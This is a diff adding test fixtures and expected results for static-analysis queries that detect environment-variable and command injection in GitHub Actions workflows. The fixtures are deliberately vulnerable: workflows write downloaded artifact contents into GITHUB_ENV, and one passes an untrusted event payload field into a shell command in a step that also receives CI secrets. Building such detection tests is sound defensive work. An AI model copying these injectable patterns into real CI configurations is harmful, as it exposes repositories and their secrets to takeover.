b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml @@ -0,0 +1,81 @@ +name: Write prerelease comment + +on: + workflow_run: + workflows: ["Create Pull Request Prerelease"] + types: + - completed + +jobs: + comment: + if: ${{ github.repository_owner == 'cloudflare' }} + runs-on: ubuntu-latest + name: Write comment to the PR + steps: + - name: "Put PR and workflow ID on the environment" + uses: actions/github-script@v7 + with: + script: | + // Copied from .github/extract-pr-and-workflow-id.js + const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + + for (const artifact of allArtifacts.data.artifacts) { + // Extract the PR number from the artifact name + const match = /^npm-package-(.+)-(\d+)$/.exec(artifact.name); + if (match) { + const packageName = match[1].toUpperCase(); + require("fs").appendFileSync( + process.env.GITHUB_ENV, + `\nWORKFLOW_RUN_PR_FOR_${packageName}=${match[2]}` + + `\nWORKFLOW_RUN_ID_FOR_${packageName}=${context.payload.workflow_run.id}` + ); + } + } + + - name: "Download runtime versions" + # Regular `actions/download-artifact` doesn't support downloading + # artifacts from another workflow + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: runtime-versions.md + + - name: "Put runtime versions on the environment" + id: runtime_versions + run: | + { + echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + + - name: "Download pre-release report" + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: prerelease-report.md + + - name: "Put pre-release report on the environment" + id: prerelease_report + run: | + { + echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" + + - name: "Comment on PR with Wrangler link" + uses: marocchino/sticky-pull-request-comment@v2 + with: + number: ${{ env.WORKFLOW_RUN_PR_FOR_WRANGLER }} + message: | + ${{ env.PRERELEASE_REPORT }} + + --- + + ${{ env.RUNTIME_VERSIONS }} + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml new file mode 100644 index 000000000000..3a0c4cc91b82 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml @@ -0,0 +1,80 @@ +name: Write prerelease comment + +on: + workflow_run: + workflows: ["Create Pull Request Prerelease"] + types: + - completed + +jobs: + comment: + runs-on: ubuntu-latest + name: Write comment to the PR + steps: + - name: "Put PR and workflow ID on the environment" + uses: actions/github-script@v7 + with: + script: | + // Copied from .github/extract-pr-and-workflow-id.js + const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + + for (const artifact of allArtifacts.data.artifacts) { + // Extract the PR number from the artifact name + const match = /^npm-package-(.+)-(\d+)$/.exec(artifact.name); + if (match) { + const packageName = match[1].toUpperCase(); + require("fs").appendFileSync( + process.env.GITHUB_ENV, + `\nWORKFLOW_RUN_PR_FOR_${packageName}=${match[2]}` + + `\nWORKFLOW_RUN_ID_FOR_${packageName}=${context.payload.workflow_run.id}` + ); + } + } + + - name: "Download runtime versions" + # Regular `actions/download-artifact` doesn't support downloading + # artifacts from another workflow + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: runtime-versions.md + + - name: "Put runtime versions on the environment" + id: runtime_versions + run: | + { + echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + + - name: "Download pre-release report" + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: prerelease-report.md + + - name: "Put pre-release report on the environment" + id: prerelease_report + run: | + { + echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" + + - name: "Comment on PR with Wrangler link" + uses: marocchino/sticky-pull-request-comment@v2 + with: + number: ${{ env.WORKFLOW_RUN_PR_FOR_WRANGLER }} + message: | + ${{ env.PRERELEASE_REPORT }} + + --- + + ${{ env.RUNTIME_VERSIONS }} + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 359275aef43d..cbd17161942b 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -20,6 +20,14 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -61,6 +69,14 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -84,3 +100,6 @@ subpaths | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index eaa9fed4c617..e780af4107dd 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -20,6 +20,14 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -61,5 +69,13 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml b/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml new file mode 100644 index 000000000000..d87c3cad0068 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml @@ -0,0 +1,196 @@ +name: "Run Dagger pipeline" +description: "Runs a given dagger pipeline" +inputs: + subcommand: + description: "Subcommand for airbyte-ci" + required: true + context: + description: "CI context (e.g., pull_request, manual)" + required: true + github_token: + description: "GitHub token" + required: false + dagger_cloud_token: + description: "Dagger Cloud token" + required: false + docker_hub_username: + description: "Dockerhub username" + required: false + docker_hub_password: + description: "Dockerhub password" + required: false + options: + description: "Options for the subcommand" + required: false + production: + description: "Whether to run in production mode" + required: false + default: "True" + report_bucket_name: + description: "Bucket name for CI reports" + required: false + default: "airbyte-ci-reports-multi" + gcp_gsm_credentials: + description: "GCP credentials for GCP Secret Manager" + required: false + default: "" + gcp_integration_tester_credentials: + description: "GCP credentials for integration tests" + required: false + default: "" + git_repo_url: + description: "Git repository URL" + default: https://github.com/airbytehq/airbyte.git + required: false + git_branch: + description: "Git branch to checkout" + required: false + git_revision: + description: "Git revision to checkout" + required: false + slack_webhook_url: + description: "Slack webhook URL" + required: false + metadata_service_gcs_credentials: + description: "GCP credentials for metadata service" + required: false + metadata_service_bucket_name: + description: "Bucket name for metadata service" + required: false + default: "prod-airbyte-cloud-connector-metadata-service" + sentry_dsn: + description: "Sentry DSN" + required: false + spec_cache_bucket_name: + description: "Bucket name for GCS spec cache" + required: false + default: "io-airbyte-cloud-spec-cache" + spec_cache_gcs_credentials: + description: "GCP credentials for GCS spec cache" + required: false + gcs_credentials: + description: "GCP credentials for GCS" + required: false + ci_job_key: + description: "CI job key" + required: false + s3_build_cache_access_key_id: + description: "Gradle S3 Build Cache AWS access key ID" + required: false + s3_build_cache_secret_key: + description: "Gradle S3 Build Cache AWS secret key" + required: false + airbyte_ci_binary_url: + description: "URL to airbyte-ci binary" + required: false + default: https://connectors.airbyte.com/airbyte-ci/releases/ubuntu/latest/airbyte-ci + python_registry_token: + description: "Python registry API token to publish python package" + required: false + is_fork: + description: "Whether the PR is from a fork" + required: false + default: "false" + max_attempts: + description: "Number of attempts at running the airbyte-ci command" + required: false + default: 1 + retry_wait_seconds: + description: "Number of seconds to wait between retry attempts" + required: false + default: 60 + +runs: + using: "composite" + steps: + - name: Get start timestamp + id: get-start-timestamp + shell: bash + run: echo "start-timestamp=$(date +%s)" >> $GITHUB_OUTPUT + - name: Docker login + id: docker-login + uses: docker/login-action@v3 + if: ${{ inputs.docker_hub_username != '' && inputs.docker_hub_password != '' }} + with: + username: ${{ inputs.docker_hub_username }} + password: ${{ inputs.docker_hub_password }} + - name: Install Airbyte CI + id: install-airbyte-ci + uses: ./.github/actions/install-airbyte-ci + with: + airbyte_ci_binary_url: ${{ inputs.airbyte_ci_binary_url }} + is_fork: ${{ inputs.is_fork }} + - name: Run airbyte-ci + id: run-airbyte-ci + uses: nick-fields/retry@v3 + env: + CI: "True" + CI_GIT_USER: ${{ github.repository_owner }} + CI_PIPELINE_START_TIMESTAMP: ${{ steps.get-start-timestamp.outputs.start-timestamp }} + PULL_REQUEST_NUMBER: ${{ github.event.pull_request.number }} + # Next environment variables are workflow inputs based and can be set with empty values if the inputs are not required and passed + CI_CONTEXT: "${{ inputs.context }}" + CI_GIT_BRANCH: ${{ inputs.git_branch || github.head_ref }} + CI_GIT_REPO_URL: ${{ inputs.git_repo_url }} + CI_GIT_REVISION: ${{ inputs.git_revision || github.sha }} + CI_GITHUB_ACCESS_TOKEN: ${{ inputs.github_token }} + CI_JOB_KEY: ${{ inputs.ci_job_key }} + CI_REPORT_BUCKET_NAME: ${{ inputs.report_bucket_name }} + DAGGER_CLOUD_TOKEN: "${{ inputs.dagger_cloud_token }}" + DOCKER_HUB_PASSWORD: ${{ inputs.docker_hub_password }} + DOCKER_HUB_USERNAME: ${{ inputs.docker_hub_username }} + GCP_GSM_CREDENTIALS: ${{ inputs.gcp_gsm_credentials }} + GCP_INTEGRATION_TESTER_CREDENTIALS: ${{ inputs.gcp_integration_tester_credentials }} + GCS_CREDENTIALS: ${{ inputs.gcs_credentials }} + METADATA_SERVICE_BUCKET_NAME: ${{ inputs.metadata_service_bucket_name }} + METADATA_SERVICE_GCS_CREDENTIALS: ${{ inputs.metadata_service_gcs_credentials }} + PRODUCTION: ${{ inputs.production }} + PYTHON_REGISTRY_TOKEN: ${{ inputs.python_registry_token }} + PYTHON_REGISTRY_URL: ${{ inputs.python_registry_url }} + S3_BUILD_CACHE_ACCESS_KEY_ID: ${{ inputs.s3_build_cache_access_key_id }} + S3_BUILD_CACHE_SECRET_KEY: ${{ inputs.s3_build_cache_secret_key }} + SENTRY_DSN: ${{ inputs.sentry_dsn }} + SLACK_WEBHOOK: ${{ inputs.slack_webhook_url }} + SPEC_CACHE_BUCKET_NAME: ${{ inputs.spec_cache_bucket_name }} + SPEC_CACHE_GCS_CREDENTIALS: ${{ inputs.spec_cache_gcs_credentials }} + with: + shell: bash + max_attempts: ${{ inputs.max_attempts }} + retry_wait_seconds: ${{ inputs.retry_wait_seconds }} + # 360mn > 6 hours: it's the GitHub runner max job duration + timeout_minutes: 360 + command: | + airbyte-ci --disable-update-check --disable-dagger-run --is-ci --gha-workflow-run-id=${{ github.run_id }} ${{ inputs.subcommand }} ${{ inputs.options }} + - name: Stop Engine + id: stop-engine + if: always() + shell: bash + run: | + mapfile -t containers < <(docker ps --filter name="dagger-engine-*" -q) + if [[ "${#containers[@]}" -gt 0 ]]; then + # give 5mn to the Dagger Engine to push cache data to Dagger Cloud + docker stop -t 300 "${containers[@]}"; + fi + + - name: Collect dagger engine logs + id: collect-dagger-engine-logs + if: always() + uses: jwalton/gh-docker-logs@v2 + with: + dest: "./dagger_engine_logs" + images: "registry.dagger.io/engine" + + - name: Tar logs + id: tar-logs + if: always() + shell: bash + run: tar cvzf ./dagger_engine_logs.tgz ./dagger_engine_logs + + - name: Upload logs to GitHub + id: upload-dagger-engine-logs + if: always() + uses: actions/upload-artifact@v4 + with: + name: ${{ github.job }}_dagger_engine_logs.tgz + path: ./dagger_engine_logs.tgz + retention-days: 7 diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml new file mode 100644 index 000000000000..6a449e24cf02 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml @@ -0,0 +1,63 @@ +name: Finalize connector rollout + +on: + repository_dispatch: + types: [finalize-connector-rollout] + workflow_dispatch: + inputs: + connector_name: + description: "Connector name" + required: true + action: + description: "Action to perform" + required: true + options: ["promote", "rollback"] +jobs: + finalize_rollout: + name: Finalize connector rollout + runs-on: connector-publish-large + env: + ACTION: ${{ github.event_name == 'workflow_dispatch' && github.event.inputs.action || github.event.client_payload.action }} + steps: + - name: Check action value + run: | + if [[ "${ACTION}" != "promote" && "${ACTION}" != "rollback" ]]; then + echo "Invalid action: ${ACTION}" + exit 1 + fi + shell: bash + - name: Checkout Airbyte + uses: actions/checkout@v4 + - name: Promote {{ github.event.client_payload.connector_name }} release candidate + id: promote-release-candidate + if: ${{ env.ACTION == 'promote' }} + uses: ./.github/actions/run-airbyte-ci + with: + context: "manual" + dagger_cloud_token: ${{ secrets.DAGGER_CLOUD_TOKEN_2 }} + docker_hub_password: ${{ secrets.DOCKER_HUB_PASSWORD }} + docker_hub_username: ${{ secrets.DOCKER_HUB_USERNAME }} + gcp_gsm_credentials: ${{ secrets.GCP_GSM_CREDENTIALS }} + gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + github_token: ${{ secrets.GITHUB_TOKEN }} + metadata_service_gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + sentry_dsn: ${{ secrets.SENTRY_AIRBYTE_CI_DSN }} + slack_webhook_url: ${{ secrets.PUBLISH_ON_MERGE_SLACK_WEBHOOK }} + subcommand: "connectors --name=${{ github.event.client_payload.connector_name }} publish --promote-release-candidate" + - name: Rollback {{ github.event.client_payload.connector_name }} release candidate + id: rollback-release-candidate + if: ${{ env.ACTION == 'rollback' }} + uses: ./.github/actions/run-airbyte-ci + with: + context: "manual" + dagger_cloud_token: ${{ secrets.DAGGER_CLOUD_TOKEN_2 }} + docker_hub_password: ${{ secrets.DOCKER_HUB_PASSWORD }} + docker_hub_username: ${{ secrets.DOCKER_HUB_USERNAME }} + gcp_gsm_credentials: ${{ secrets.GCP_GSM_CREDENTIALS }} + gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + github_token: ${{ secrets.GITHUB_TOKEN }} + metadata_service_gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + sentry_dsn: ${{ secrets.SENTRY_AIRBYTE_CI_DSN }} + slack_webhook_url: ${{ secrets.PUBLISH_ON_MERGE_SLACK_WEBHOOK }} + spec_cache_gcs_credentials: ${{ secrets.SPEC_CACHE_SERVICE_ACCOUNT_KEY_PUBLISH }} + subcommand: "connectors --name=${{ github.event.client_payload.connector_name }} publish --rollback-release-candidate" diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index decabad082fb..b66822accab3 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -1,6 +1,13 @@ edges +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | 